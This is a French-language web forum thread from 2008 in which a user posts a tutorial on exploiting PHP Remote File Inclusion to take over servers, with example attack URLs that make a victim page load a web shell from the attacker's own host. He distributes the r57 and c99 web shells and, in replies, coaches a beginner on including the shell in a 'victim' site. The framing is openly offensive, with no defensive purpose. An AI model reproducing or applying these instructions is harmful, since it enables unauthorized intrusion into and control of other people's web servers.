POUR ACCEDER A L'AFICHAGE GRAPHIQUE CLIKER SUR LE FORUM SOUHAITE PUIS CLIKER SUR  
<---C l i c k e r i c i --->
Précédent   POUR ACCEDER A L'AFICHAGE GRAPHIQUE CLIKER SUR LE FORUM SOUHAITE PUIS CLIKER SUR " Voir la Version Complète " > CasaWolfs infographie > securite Site Web
S'inscrire FAQTop Statistics Membres Calendrier Recherche Messages du jour Marquer les forums comme lus

securite Site Web PHP Remote File Inclusion ,telechargement VNC ,protection via Google ,shell c99 r57,hack site web,vulnerabilites,injection sql,buffer overflow,xss

Réponse
 
LinkBack Outils de la discussion Note: Note de la discussion : 4 vote(s), moyenne 5,00. Modes d'affichage
  #1 (permalink)  
Vieux 24/01/2008, 19h06
Satsujin
Guest
 
Messages: n/a
Par défaut

Bonjour,
On entend beaucoup parler du RFI, le remote file inclusion, cette vulnérabilité permet au pirate d'inclure un shell PHP, et de controler le serveur infecté.
Cette attaque repose sur un principe très basique :
Dans le site infecté, il y a une page principale nommée index.php, et pour ne pas refaire le code essentiel a chaque fois, le webmaster ne fait qu'inclure une page au milieux de cette page index, comme suit :


(désolé pour l'image made in MSPaint )

on voit que la page index.php (fond bleu) inclus la page page.php (fond jaune).
le nom de la page à inclure est passé en paramètre dans l'url (méthode GET pour les connaisseurs PHP), par exemple : h**p://www.victim.com/index.php?page=page
on voit bien que la page index.php doit contenir la page page.php (le code de la page index.php interprète automatiquement le code de la page incluse en PHP). Comme je l'ai deja mentionné, notre but est d'inclure une page externe (hebérgée sur notre propre serveur) dans la page vulnérable, ce qui pourrait donner : h**p://www.victim.com/index.php?page=http://www.monsite.com/shell.txt?
Dans cet exemple, on inclus la page h**p://www.monsite.com/shell.txt dans la page infectée index.php.
Remarque : h**p://www.monsite.com/shell.txt est hébérgé sur notre propre serveur, et en extention .txt et pas en .php pour ne pas qu'il s'éxecute sur notre serveur.
Quand on parvient a inclure le shell dans la page vulnérable, on a tout fait, il ne reste que savourer le pouvoir absolu sur tout le serveur qui hébérge le site.
dans les fichiers attachés vous trouverez deux des meilleurs shells PHP, le r57 et le c99.

Ce tuto sera enrichi par des images et des exemples bientot,
Ciao, a bientot,
Satsujin

Fichiers attachés vous ne pouvez pas voir le lien [ enregistrez vous ici]

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Last edited by Satsujin; 24/01/2008 at 19h49.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Modifier/Supprimer le message Réponse avec citation
The Following 2 Users Say Thank You to For This Useful Post:
arhror (24/01/2008), ucef (06/02/2008)
Sponsored Links

Sponsored Links
Recherche personnalisée
  #2 (permalink)  
Vieux 24/01/2008, 19h39
Administrator
 
Date d'inscription: janvier 2008
Messages: 1 221
Thanks: 114
Thanked 63 Times in 44 Posts
Thumbs up ucef

est ce que tu peux clarifier encore plus?
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Réponse avec citation
  #3 (permalink)  
Vieux 25/01/2008, 11h42
Satsujin
Guest
 
Messages: n/a
Par défaut

Citation:
Posté par ucef vous ne pouvez pas voir le lien [ enregistrez vous ici]]]
est ce que tu peux clarifier encore plus?
Wé bien sur mon frère je vais détailler un petit peu plus pour que tout le monde comprenne.

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Last edited by Satsujin; 25/01/2008 at 11h44.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Modifier/Supprimer le message Réponse avec citation
  #4 (permalink)  
Vieux 06/02/2008, 22h08
Junior Member
 
Date d'inscription: février 2008
Messages: 5
Thanks: 0
Thanked 0 Times in 0 Posts
Par défaut

c'est vraiment interessant, j'ai utilisé le php que pour la creation des application web, j'ai j'amais eu le temps l'utiliser contre les failles
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Réponse avec citation
  #5 (permalink)  
Vieux 07/02/2008, 01h11
Junior Member
 
Date d'inscription: février 2008
Messages: 5
Thanks: 0
Thanked 0 Times in 0 Posts
Par défaut

Citation:
Posté par Satsujin vous ne pouvez pas voir le lien [ enregistrez vous ici]]]
Wé bien sur mon frère je vais détailler un petit peu plus pour que tout le monde comprenne.
le fichier joint n'est pas telechargeable, tu peux le reuploder stp
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Réponse avec citation
  #6 (permalink)  
Vieux 11/04/2008, 09h34
Junior Member
 
Date d'inscription: avril 2008
Messages: 1
Thanks: 0
Thanked 0 Times in 0 Posts
Par défaut Victime

bjr tts le monde

apres uploadé le shell C99 Cmnt faire pr se connecté vers le serveur victime? avec le browser ??? et esk on laisse l'extension du c99.txt ou bien en doit la changer ?
si il il faut la changer cmnt faire ?

je pose tres de kestion loool
Merci d'avance
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Réponse avec citation
  #7 (permalink)  
Vieux 12/04/2008, 16h09
Satsujin
Guest
 
Messages: n/a
Par défaut

Citation:
Posté par dadinou3 vous ne pouvez pas voir le lien [ enregistrez vous ici]]]
bjr tts le monde

apres uploadé le shell C99 Cmnt faire pr se connecté vers le serveur victime? avec le browser ??? et esk on laisse l'extension du c99.txt ou bien en doit la changer ?
si il il faut la changer cmnt faire ?

je pose tres de kestion loool
Merci d'avance
Salut,
Après avoir uploadé le shell sur ton propre serveur en format .txt, tu cherche une faille include et tu l'inclus dans la page victime( par ex.: victim.com/page.php?page=http://monserveur.com/monshell.txt? ), après, il sera interprété dans la page victime comme du php et tu pourras l'utiliser sans changer d'extension. Mais ne l'upload jamais sur ton serveur en PHP, car il pourra etre utilisé contre ton serveur.
C'est bien de poser bcp de questions, si t'en a d'autres on est la.
A+

Satsujin
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Modifier/Supprimer le message Réponse avec citation
  #8 (permalink)  
Vieux 12/04/2008, 16h17
Satsujin
Guest
 
Messages: n/a
Par défaut

Citation:
Posté par the infinite one vous ne pouvez pas voir le lien [ enregistrez vous ici]]]
le fichier joint n'est pas telechargeable, tu peux le reuploder stp
Salut,
pour télécharger le shell r57, allez vous ne pouvez pas voir le lien [ enregistrez vous ici]]]
pour le C99, c'est vous ne pouvez pas voir le lien [ enregistrez vous ici]]]
et copiez tout le contenu et enregistrer dans un fichier .txt, ou si vous ne voulez pas l'enregistrer, incluez le depuis la meme adresse, sa marcheras.

Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Modifier/Supprimer le message Réponse avec citation
  #9 (permalink)  
Vieux 14/06/2008, 11h17
Junior Member
 
Date d'inscription: juin 2008
Messages: 1
Thanks: 0
Thanked 0 Times in 0 Posts
Par défaut

mecri 11111111
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Réponse avec citation
  #10 (permalink)  
Vieux 16/06/2008, 12h00
Junior Member
 
Date d'inscription: juin 2008
Messages: 1
Thanks: 0
Thanked 0 Times in 0 Posts
Par défaut salam

je vais tester chokran...
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Réponse avec citation
Réponse

Tags
Aucune

Recherche personnalisée


Outils de la discussion
Modes d'affichage Noter la discussion
Noter la discussion:

Règles de messages
You may post new threads
You may post replies
You may post attachments
You may edit your posts

Les balises BB sont activées : oui
Les smileys sont activés : oui
La balise [IMG] est activée : oui
Le code HTML peut être employé : non
Trackbacks are oui
Pingbacks are oui
Refbacks are oui

Outils de modération:



Fuseau horaire GMT. Il est actuellement 06h05.


Édité par : vBulletin® version 3.7.0 Beta 3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.1.0 ©2007, Crawlability, Inc. Tous droits réservés.
Version française #12 par l'association vBulletin francophone